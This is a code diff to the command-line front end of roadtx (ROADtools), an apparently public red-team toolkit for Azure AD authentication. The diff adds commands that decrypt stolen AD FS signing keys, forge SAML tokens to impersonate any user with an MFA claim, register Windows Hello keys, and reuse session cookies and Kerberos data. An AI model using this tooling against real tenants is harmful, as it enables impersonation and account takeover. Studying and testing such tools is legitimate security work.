@@ -9,6 +9,7 @@ from urllib.parse import quote_plus
 from roadtools.roadlib.auth import Authentication, get_data, WELLKNOWN_CLIENTS, WELLKNOWN_RESOURCES
 from roadtools.roadlib.deviceauth import DeviceAuthentication
 from roadtools.roadtx.selenium import SeleniumAuthentication
+from roadtools.roadtx.federation import EncryptedPFX, SAMLSigner, encode_object_guid
 import pyotp
 
 RR_HELP = 'ROADtools Token eXchange by Dirk-jan Mollema (@_dirkjan) / Outsider Security (outsidersecurity.nl)'
@@ -16,6 +17,9 @@ RR_HELP = 'ROADtools Token eXchange by Dirk-jan Mollema (@_dirkjan) / Outsider S
 def main():
     # Primary argument parser
     parser = argparse.ArgumentParser(add_help=True, description=RR_HELP, formatter_class=argparse.RawDescriptionHelpFormatter)
+    parser.add_argument('-p', '--proxy', action='store', help="Proxy requests through a proxy (format: proxyip:port). Ignores TLS validation if specified, unless --secure is used.")
+    parser.add_argument('-s', '--secure', action='store_true', help="Enforce certificate validation even if using a proxy")
+
     # Add subparsers for modules
     subparsers = parser.add_subparsers(dest='command')
 
@@ -66,16 +70,30 @@ def main():
     prt_parser.add_argument('--cert-pfx', action='store', metavar='file', help='Device cert and key as PFX file')
     prt_parser.add_argument('--pfx-pass', action='store', metavar='password', help='PFX file password')
     prt_parser.add_argument('--pfx-base64', action='store', metavar='BASE64', help='PFX file as base64 string')
+    prt_parser.add_argument('-tk', '--transport-key-pem', action='store', metavar='file', help='Private key file containing transport key (if different from device key)')
 
     prt_parser.add_argument('-u', '--username', action='store', metavar='USER', help='User to authenticate')
     prt_parser.add_argument('-p', '--password', action='store', metavar='PASSWORD', help='Password')
     prt_parser.add_argument('-r', '--refresh-token', action='store', help='Refresh token')
+    prt_parser.add_argument('--saml-token', action='store', help='SAML token for federated auth (use value stdin to read from input)')
+
 
 
     prt_parser.add_argument('-f', '--prt-file', default="roadtx.prt", action='store', metavar='FILE', help='PRT storage file (to save or load in case of renewal)')
     prt_parser.add_argument('--prt', action='store', metavar='PRT', help='Primary Refresh Token (for renewal)')
     prt_parser.add_argument('-s', '--prt-sessionkey', action='store', help='Primary Refresh Token session key (as hex key)')
 
+    prt_parser.add_argument('-hk', '--hello-key', action='store', help='Windows Hello PEM file')
+    # Construct winhello module
+    winhello_parser = subparsers.add_parser('winhello', help='Register Windows Hello key')
+    winhello_parser.add_argument('-k', '--key-pem', action='store', metavar='file', help='Private key file for key storage (default: winhello.key)')
+    winhello_parser.add_argument('--access-token', action='store', help='Access token for device registration service. If not specified, taken from .roadtools_auth')
+
+    # Construct winhello key generation module - included for reference
+    # winhello_parser = subparsers.add_parser('genhellokey', help='Generate Windows Hello key')
+    # winhello_parser.add_argument('-k', '--key-pem', action='store', metavar='file', help='Private key file for key storage (default: winhello.key)')
+    # winhello_parser.add_argument('-d', '--device-id', action='store', help='Device ID to use for key object')
+
     # Construct PRT authmodule
     prtauth_parser = subparsers.add_parser('prtauth', help='Authenticate using a PRT (emulates WAM token broker)')
     helptext = 'Client ID to use when authenticating.'
@@ -162,6 +180,37 @@ def main():
                                  action='store',
                                  help="Code to auth with that you got from Azure AD")
 
+    # Desktop SSO auth
+    desktopsso_parser = subparsers.add_parser('desktopsso', help='Desktop SSO authentication - either with plaintext creds or Kerberos auth')
+    clienthelptext = 'Client ID (application ID) to use when authenticating. Accepts aliases (list with roadtx listaliases)'
+    desktopsso_parser.add_argument('-c',
+                                   '--client',
+                                   action='store',
+                                   help=clienthelptext,
+                                   default='1b730954-1685-4b74-9bfd-dac224a7b894')
+    desktopsso_parser.add_argument('-u', '--username', action='store', metavar='USER', help='User to authenticate')
+    desktopsso_parser.add_argument('-p', '--password', action='store', metavar='PASSWORD', help='Password of the user')
+    desktopsso_parser.add_argument('--krbtoken',
+                                   action='store',
+                                   help='Kerberos auth data from krbsso.py')
+    desktopsso_parser.add_argument('-r',
+                                   '--resource',
+                                   action='store',
+                                   help='Resource to authenticate to. Either a full URL or alias (list with roadtx listaliases)',
+                                   default='https://graph.windows.net')
+    desktopsso_parser.add_argument('-t',
+                                   '--tenant',
+                                   action='store',
+                                   required=True,
+                                   help='Tenant ID or domain to auth to')
+    desktopsso_parser.add_argument('--tokenfile',
+                                   action='store',
+                                   help='File to store the credentials (default: .roadtools_auth)',
+                                   default='.roadtools_auth')
+    desktopsso_parser.add_argument('--tokens-stdout',
+                                   action='store_true',
+                                   help='Do not store tokens on disk, pipe to stdout instead')
+
     # List aliases
     subparsers.add_parser('listaliases', help='List aliases that can be used as client ID or resource URL')
 
@@ -194,6 +243,12 @@ def main():
     intauth_parser = subparsers.add_parser('interactiveauth', help='Interactive authentication in Selenium browser window, optional autofill')
     intauth_parser.add_argument('-u', '--username', action='store', metavar='USER', help='User to authenticate')
     intauth_parser.add_argument('-p', '--password', action='store', metavar='PASSWORD', help='Password of the user')
+    intauth_parser.add_argument('--krbtoken',
+                                action='store',
+                                help='Kerberos auth data from krbsso.py')
+    intauth_parser.add_argument('--estscookie',
+                                action='store',
+                                help='ESTSAUTHPERSISTENT cookie from browser')
     intauth_parser.add_argument('-url', '--auth-url', action='store', metavar='URL', help=urlhelp)
     intauth_parser.add_argument('-c',
                                 '--client',
@@ -230,6 +285,12 @@ def main():
     intauth_parser.add_argument('-k', '--keep-open',
                                 action='store_true',
                                 help='Do not close the browser window after timeout. Useful if you want to browse online apps with the obtained credentials')
+    intauth_parser.add_argument('--capture-code',
+                                action='store_true',
+                                help='Do not attempt to redeem any authentication code but print it instead')
+    intauth_parser.add_argument('--federated',
+                                action='store_true',
+                                help='Fill in password on Federation server login page (assumes AD FS)')
 
     # Interactive auth using Selenium - creds from keepass
     kdbauth_parser = subparsers.add_parser('keepassauth', help='Selenium based authentication with credentials from a KeePass database')
@@ -275,6 +336,10 @@ def main():
     kdbauth_parser.add_argument('--capture-code',
                                 action='store_true',
                                 help='Do not attempt to redeem any authentication code but print it instead')
+    kdbauth_parser.add_argument('--federated',
+                                action='store_true',
+                                help='Fill in password on Federation server login page (assumes AD FS)')
+
 
     # Interactive auth using Selenium - inject PRT
     browserprtauth_parser = subparsers.add_parser('browserprtauth', help='Selenium based auth with automatic PRT usage. Emulates Edge browser with PRT')
@@ -296,6 +361,10 @@ def main():
     browserprtauth_parser.add_argument('-ru', '--redirect-url', action='store', metavar='URL',
                                        help='Redirect URL used when authenticating (default: https://login.microsoftonline.com/common/oauth2/nativeclient)',
                                        default="https://login.microsoftonline.com/common/oauth2/nativeclient")
+    browserprtauth_parser.add_argument('-t',
+                                       '--tenant',
+                                       action='store',
+                                       help='Tenant ID or domain to auth to')
     browserprtauth_parser.add_argument('-f', '--prt-file', default="roadtx.prt", action='store', metavar='FILE', help='PRT storage file (default: roadtx.prt)')
     browserprtauth_parser.add_argument('--prt',
                                        action='store',
@@ -384,13 +453,14 @@ def main():
                                 help='Path to geckodriver file on disk (download from: https://github.com/mozilla/geckodriver/releases)',
                                 default='geckodriver')
     enrauth_parser.add_argument('-f', '--prt-file', default="roadtx.prt", action='store', metavar='FILE', help='PRT storage file (default: roadtx.prt)')
+    enrauth_parser.add_argument('--no-prt', action='store_true', help='Perform the flow without a PRT')
     enrauth_parser.add_argument('--prt',
                                 action='store',
                                 help='Primary Refresh Token')
     enrauth_parser.add_argument('--prt-sessionkey',
                                 action='store',
                                 help='Primary Refresh Token session key (as hex key)')
-    # enrauth_parser.add_argument('--ngcmfa-drs-auth', action='store_true', help="Don't request PRT with MFA claim but get access token with ngcmfa claim for DRS instead.")
+    enrauth_parser.add_argument('--ngcmfa-drs-auth', action='store_true', help="Don't request PRT with MFA claim but get access token with ngcmfa claim for DRS instead.")
     enrauth_parser.add_argument('--tokenfile',
                                 action='store',
                                 help='File to store the credentials (default: .roadtools_auth)',
@@ -399,8 +469,29 @@ def main():
                                 action='store_true',
                                 help='Do not store tokens on disk, pipe to stdout instead')
 
+    # ADFS Encrypted blob decrypt
+    adfsdec_parser = subparsers.add_parser('decryptadfskey', help='Decrypt Encrypted PFX blob from ADFSpoof into PEM or PFX file')
+    adfsdec_parser.add_argument('-c', '--cert-pem', action='store', metavar='file', default='roadtx_adfs.pem', help='Certificate file to save ADFS cert (default: roadtx_adfs.pem)')
+    adfsdec_parser.add_argument('-k', '--key-pem', action='store', metavar='file', default='roadtx_adfs.key', help='Private key file to save ADFS key (default: roadtx_adfs.key)')
+    adfsdec_parser.add_argument('--cert-pfx', action='store', metavar='file', default='roadtx_adfs.pfx', help='File to store the key (default: roadtx_adfs.pfx)')
+    adfsdec_parser.add_argument('-o', '--output-format', action='store', metavar='format', default='pem', choices=['pem', 'pfx'], help='Output format (pem or pfx), default: pem')
+    adfsdec_parser.add_argument('encryptedpfx', action='store', metavar='pfxblob', help='EncryptedPFX data from ADFSpoof')
+    adfsdec_parser.add_argument('key', action='store', metavar='key', help='Decryption key (DKM key)')
+    adfsdec_parser.add_argument('-v', '--verbose', action='store_true', help='Show extra information')
+
+    # ADFS token generation
+    samltoken_parser = subparsers.add_parser('samltoken', help='Create a SAML token using an AD FS key')
+    samltoken_parser.add_argument('-c', '--cert-pem', action='store', metavar='file', help='Certificate file with AD FS cert')
+    samltoken_parser.add_argument('-k', '--key-pem', action='store', metavar='file', help='Private key file with AD FS key')
+    samltoken_parser.add_argument('--cert-pfx', action='store', metavar='file', help='PFX file with AD FS cert/key')
+    samltoken_parser.add_argument('--pfx-pass', action='store', metavar='password', help='PFX file password')
+    samltoken_parser.add_argument('--pfx-base64', action='store', metavar='BASE64', help='PFX file as base64 string')
+    samltoken_parser.add_argument('-i', '--issuer', action='store', required=True, help='Token issuer, must match the federated domain name (without http/https, example: federated.mycompany.com)')
+    samltoken_parser.add_argument('-u', '--unique-id', action='store', help='Unique ID of user to spoof (immutableId in roadrecon)')
+    samltoken_parser.add_argument('-g', '--guid', action='store', help='GUID of user to spoof (from AD), if not specifying the unique id')
+    samltoken_parser.add_argument('-m', '--mfa', action='store_true', help='Include MFA claim in token')
+    samltoken_parser.add_argument('--upn', action='store', required=True, help='userPrincipalName of user to spoof')
 
-    args = parser.parse_args()
 
     if len(sys.argv) < 2:
         parser.print_help()
@@ -409,8 +500,20 @@ def main():
 
     deviceauth = DeviceAuthentication()
     args = parser.parse_args()
+    seleniumproxy = None
+
+    if args.proxy:
+        auth.proxies = deviceauth.proxies = {
+            'https': f'http://{args.proxy}'
+        }
+        seleniumproxy = f'http://{args.proxy}'
+        if not args.secure:
+            auth.verify = deviceauth.verify = False
+
     if args.command in ('auth', 'gettokens', 'gettoken'):
         auth.parse_args(args)
+        if not args.tokens_stdout:
+            print(f'Requesting token for resource {auth.resource_uri}')
         res = auth.get_tokens(args)
         if not res:
             return
@@ -448,15 +551,24 @@ def main():
         if args.action == 'request':
             if not deviceauth.loadcert(args.cert_pem, args.key_pem, args.cert_pfx, args.pfx_pass, args.pfx_base64):
                 return
+            if args.transport_key_pem:
+                # Try loading transport key separately
+                if not deviceauth.loadkey(args.transport_key_pem, transport_only=True):
+                    return
             prtdata = None
             if args.username and args.password:
                 prtdata = deviceauth.get_prt_with_password(args.username, args.password)
+            if args.saml_token:
+                if args.saml_token.lower() == 'stdin':
+                    samltoken = sys.stdin.read()
+                else:
+                    samltoken = args.saml_token
+                prtdata = deviceauth.get_prt_with_samltoken(samltoken)
             if args.refresh_token:
                 prtdata = deviceauth.get_prt_with_refresh_token(args.refresh_token)
-            # if args.username and deviceauth.loadhellokey(args.hello_key):
-            #     prtdata = deviceauth.get_prt_with_hello_key(args.username)
-            # if args.username and args.hello_assertion:
-            #     prtdata = deviceauth.get_prt_with_hello_key(args.username, args.hello_assertion)
+
+            if args.username and deviceauth.loadhellokey(args.hello_key):
+                prtdata = deviceauth.get_prt_with_hello_key(args.username)
             if not prtdata:
                 print('You must specify a username + password or refresh token that can be used to request a PRT')
                 return
@@ -528,9 +640,19 @@ def main():
     elif args.command == 'codeauth':
         auth.set_client_id(args.client)
         auth.set_resource_uri(args.resource)
+        auth.tenant = args.tenant
         auth.authenticate_with_code_native(args.code, args.redirect_url, client_secret=args.password)
         auth.outfile = args.tokenfile
         auth.save_tokens(args)
+    elif args.command == 'desktopsso':
+        auth.set_client_id(args.client)
+        auth.set_resource_uri(args.resource)
+        auth.tenant = args.tenant
+        dsso_code = auth.get_desktopsso_token(args.username, args.password, args.krbtoken)
+        if dsso_code:
+            auth.authenticate_with_desktopsso_token(dsso_code)
+            auth.outfile = args.tokenfile
+            auth.save_tokens(args)
     elif args.command == 'listaliases':
         print('Well-known clients. Can be used as alias with -c or --client')
         print()
@@ -544,7 +666,8 @@ def main():
     elif args.command == 'interactiveauth':
         auth.set_client_id(args.client)
         auth.set_resource_uri(args.resource)
-        selauth = SeleniumAuthentication(auth, deviceauth, args.redirect_url)
+        auth.tenant = args.tenant
+        selauth = SeleniumAuthentication(auth, deviceauth, args.redirect_url, proxy=seleniumproxy)
         if args.auth_url:
             url = args.auth_url
         else:
@@ -552,14 +675,24 @@ def main():
         service = selauth.get_service(args.driver_path)
         if not service:
             return
-        selauth.driver = selauth.get_webdriver(service)
-        selauth.selenium_login(url, args.username, args.password)
+        selauth.driver = selauth.get_webdriver(service, intercept=True)
+        if args.krbtoken:
+            result = selauth.selenium_login_with_kerberos(url, args.username, args.password, capture=args.capture_code, krbdata=args.krbtoken)
+        elif args.estscookie:
+            result = selauth.selenium_login_with_estscookie(url, args.username, args.password, capture=args.capture_code, estscookie=args.estscookie)
+        else:
+            result = selauth.selenium_login(url, args.username, args.password, capture=args.capture_code, federated=args.federated)
+        if args.capture_code:
+            if result:
+                print(f'Captured auth code: {result}')
+            return
         auth.outfile = args.tokenfile
         auth.save_tokens(args)
     elif args.command == 'keepassauth':
         auth.set_client_id(args.client)
         auth.set_resource_uri(args.resource)
-        selauth = SeleniumAuthentication(auth, deviceauth, args.redirect_url)
+        auth.tenant = args.tenant
+        selauth = SeleniumAuthentication(auth, deviceauth, args.redirect_url, proxy=seleniumproxy)
         password, otpseed = selauth.get_keepass_cred(args.username, args.keepass, args.keepass_password)
         if args.auth_url:
             url = args.auth_url
@@ -569,14 +702,17 @@ def main():
         if not service:
             return
         selauth.driver = selauth.get_webdriver(service)
-        selauth.selenium_login(url, args.username, password, otpseed, keep=args.keep_open, capture=args.capture_code)
+        result = selauth.selenium_login(url, args.username, password, otpseed, keep=args.keep_open, capture=args.capture_code, federated=args.federated)
         if args.capture_code:
+            if result:
+                print(f'Captured auth code: {result}')
             return
         auth.outfile = args.tokenfile
         auth.save_tokens(args)
     elif args.command == 'browserprtauth':
         auth.set_client_id(args.client)
         auth.set_resource_uri(args.resource)
+        auth.tenant = args.tenant
         if args.prt and args.prt_sessionkey:
             deviceauth.setprt(args.prt, args.prt_sessionkey)
         elif args.prt_cookie:
@@ -586,7 +722,7 @@ def main():
         else:
             print('You must either supply a PRT and session key on the command line or a file that contains them')
             return
-        selauth = SeleniumAuthentication(auth, deviceauth, args.redirect_url)
+        selauth = SeleniumAuthentication(auth, deviceauth, args.redirect_url, proxy=seleniumproxy)
         if args.auth_url:
             url = args.auth_url
         else:
@@ -595,15 +731,19 @@ def main():
         if not service:
             return
         selauth.driver = selauth.get_webdriver(service, intercept=True)
-        if not selauth.selenium_login_with_prt(url, keep=args.keep_open, prtcookie=args.prt_cookie, capture=args.capture_code):
+        result = selauth.selenium_login_with_prt(url, keep=args.keep_open, prtcookie=args.prt_cookie, capture=args.capture_code)
+        if not result:
             return
         if args.capture_code:
+            if result:
+                print(f'Captured auth code: {result}')
             return
         auth.outfile = args.tokenfile
         auth.save_tokens(args)
     elif args.command == 'browserprtinject':
         auth.set_client_id(args.client)
         auth.set_resource_uri(args.resource)
+        auth.tenant = args.tenant
         if args.prt and args.prt_sessionkey:
             deviceauth.setprt(args.prt, args.prt_sessionkey)
         elif args.prt_file and deviceauth.loadprt(args.prt_file):
@@ -635,13 +775,14 @@ def main():
         auth.outfile = args.tokenfile
         auth.save_tokens(args)
     elif args.command == 'prtenrich':
-        if args.prt and args.prt_sessionkey:
-            deviceauth.setprt(args.prt, args.prt_sessionkey)
-        elif args.prt_file and deviceauth.loadprt(args.prt_file):
-            pass
-        else:
-            print('You must either supply a PRT and session key on the command line or a file that contains them')
-            return
+        if not args.no_prt:
+            if args.prt and args.prt_sessionkey:
+                deviceauth.setprt(args.prt, args.prt_sessionkey)
+            elif args.prt_file and deviceauth.loadprt(args.prt_file):
+                pass
+            else:
+                print('You must either supply a PRT and session key on the command line or a file that contains them')
+                return
         auth.set_client_id('29d9ed98-a469-4536-ade2-f981bc1d605e')
         if args.username:
             hint = '&login_hint=' + quote_plus(args.username)
@@ -650,13 +791,13 @@ def main():
         replyurl = "ms-appx-web://Microsoft.AAD.BrokerPlugin/DRS"
         url = f'https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=29d9ed98-a469-4536-ade2-f981bc1d605e&redirect_uri=ms-appx-web%3a%2f%2fMicrosoft.AAD.BrokerPlugin%2fDRS&resource=urn%3aaad%3atb%3aupdate%3aprt&add_account=noheadsup&scope=openid{hint}&response_mode=form_post&windows_api_version=2.0&amr_values=ngcmfa'
 
-        # if args.ngcmfa_drs_auth:
-        #     # Get ngcmfa token for device registration service
-        #     auth.set_client_id('dd762716-544d-4aeb-a526-687b73838a22')
-        #     replyurl = "ms-appx-web://Microsoft.AAD.BrokerPlugin/dd762716-544d-4aeb-a526-687b73838a22"
-        #     url = f'https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=dd762716-544d-4aeb-a526-687b73838a22&redirect_uri=ms-appx-web%3a%2f%2fMicrosoft.AAD.BrokerPlugin%2fdd762716-544d-4aeb-a526-687b73838a22&resource=urn%3ams-drs%3aenterpriseregistration.windows.net&add_account=noheadsup&scope=openid{hint}&response_mode=form_post&windows_api_version=2.0&amr_values=ngcmfa'
+        if args.ngcmfa_drs_auth:
+            # Get ngcmfa token for device registration service
+            auth.set_client_id('dd762716-544d-4aeb-a526-687b73838a22')
+            replyurl = "ms-appx-web://Microsoft.AAD.BrokerPlugin/dd762716-544d-4aeb-a526-687b73838a22"
+            url = f'https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=dd762716-544d-4aeb-a526-687b73838a22&redirect_uri=ms-appx-web%3a%2f%2fMicrosoft.AAD.BrokerPlugin%2fdd762716-544d-4aeb-a526-687b73838a22&resource=urn%3ams-drs%3aenterpriseregistration.windows.net&add_account=noheadsup&scope=openid{hint}&response_mode=form_post&windows_api_version=2.0&amr_values=ngcmfa'
 
-        selauth = SeleniumAuthentication(auth, deviceauth, replyurl)
+        selauth = SeleniumAuthentication(auth, deviceauth, replyurl, proxy=seleniumproxy)
         if args.username and args.keepass and (args.keepass_password or 'KPPASS' in os.environ or args.keepass.endswith('.xml')):
             _, otpseed = selauth.get_keepass_cred(args.username, args.keepass, args.keepass_password)
         else:
@@ -667,16 +808,16 @@ def main():
         selauth.driver = selauth.get_webdriver(service, intercept=True)
         tokenreply = selauth.selenium_enrich_prt(url, otpseed=otpseed)
         # Save tokens
-        # if args.ngcmfa_drs_auth:
-        #     auth.tokendata = auth.tokenreply_to_tokendata(tokenreply)
-        #     auth.outfile = args.tokenfile
-        #     auth.save_tokens(args)
-        # else:
-        if tokenreply['refresh_token']:
-            print('Got refresh token. Can be used to request prt with roadtx prt -r <refreshtoken>')
-            print(tokenreply['refresh_token'])
+        if args.ngcmfa_drs_auth:
+            auth.tokendata = auth.tokenreply_to_tokendata(tokenreply)
+            auth.outfile = args.tokenfile
+            auth.save_tokens(args)
         else:
-            print('No tokendata found. Something probably went wrong')
+            if tokenreply['refresh_token']:
+                print('Got refresh token. Can be used to request prt with roadtx prt -r <refreshtoken>')
+                print(tokenreply['refresh_token'])
+            else:
+                print('No tokendata found. Something probably went wrong')
 
     elif args.command == 'getotp':
         selauth = SeleniumAuthentication(auth, deviceauth, None)
@@ -713,5 +854,70 @@ def main():
         header, body, signature = auth.parse_jwt(tokendata)
         print(json.dumps(header, sort_keys=True, indent=4))
         print(json.dumps(body, sort_keys=True, indent=4))
+    elif args.command == 'winhello':
+        if args.access_token:
+            tokenobject, tokendata = auth.parse_accesstoken(args.access_token)
+        else:
+            try:
+                with codecs.open('.roadtools_auth', 'r', 'utf-8') as infile:
+                    tokenobject = json.load(infile)
+                _, tokendata = auth.parse_accesstoken(tokenobject['accessToken'])
+            except FileNotFoundError:
+                print('No auth data found. Ether supply an access token with --access-token or make sure a token is present on disk in .roadtools_auth')
+                return
+        if tokendata['aud'] != 'urn:ms-drs:enterpriseregistration.windows.net':
+            print(f"Wrong token audience, got {tokendata['aud']} but expected: urn:ms-drs:enterpriseregistration.windows.net")
+            print("Make sure to request a token with -r urn:ms-drs:enterpriseregistration.windows.net")
+            return
+        key, pubkeycngblob = deviceauth.create_hello_key(args.key_pem)
+        result = deviceauth.register_winhello_key(pubkeycngblob, tokenobject['accessToken'])
+        print(result)
+
+    elif args.command == 'genhellokey':
+        key, pubkeycngblob = deviceauth.create_hello_key(args.key_pem)
+        if not args.device_id:
+            deviceid = "d22a8b4b-d138-4271-a677-de4208305cb3"
+        else:
+            deviceid = args.device_id
+        data = {
+            "usage": "NGC",
+            "keyIdentifier": deviceauth.get_privkey_kid(key),
+            "keyMaterial": pubkeycngblob.decode('utf-8'),
+            "creationTime": "2022-10-12T18:29:51.3793062Z",
+            "deviceId": deviceid,
+            "customKeyInformation": "AQAAAAACAAAAAAAAAAAA",
+            "fidoAaGuid": None,
+            "fidoAuthenticatorVersion": None,
+            "fidoAttestationCertificates": []
+        }
+        print(json.dumps(data, sort_keys=True, indent=4))
+    elif args.command == 'decryptadfskey':
+        rawblob = base64.b64decode(args.encryptedpfx)
+        rawkey = binascii.unhexlify(args.key.replace('-',''))
+        pfx = EncryptedPFX(rawblob, rawkey, args.verbose)
+        decrypted_pfx = pfx.decrypt_pfx()
+        if args.output_format == 'pfx':
+            pfx.save_pfx(decrypted_pfx, args.cert_pfx)
+            print(f'Saved decrypted key to {args.cert_pfx}')
+        else:
+            pfx.save_pem(decrypted_pfx, args.cert_pem, args.key_pem)
+            print(f'Saved decrypted certificate to {args.cert_pem} and key to {args.key_pem}')
+    elif args.command == 'samltoken':
+        signer = SAMLSigner()
+        if not signer.loadcert(args.cert_pem, args.key_pem, args.cert_pfx, args.pfx_pass, args.pfx_base64):
+            sys.exit(1)
+        if not args.unique_id and not args.guid:
+            print('Either the unique-id or guid of the user to spoof is required')
+            sys.exit(1)
+        elif args.unique_id:
+            uid = args.unique_id
+        else:
+            uid = encode_object_guid(args.guid)
+        template, assertionid = signer.format_template(uid, args.upn, args.issuer, args.mfa)
+        signed = signer.sign_xml(template, assertionid)
+        print(signed.decode('utf-8'))
+
+
+
 if __name__ == '__main__':
     main()
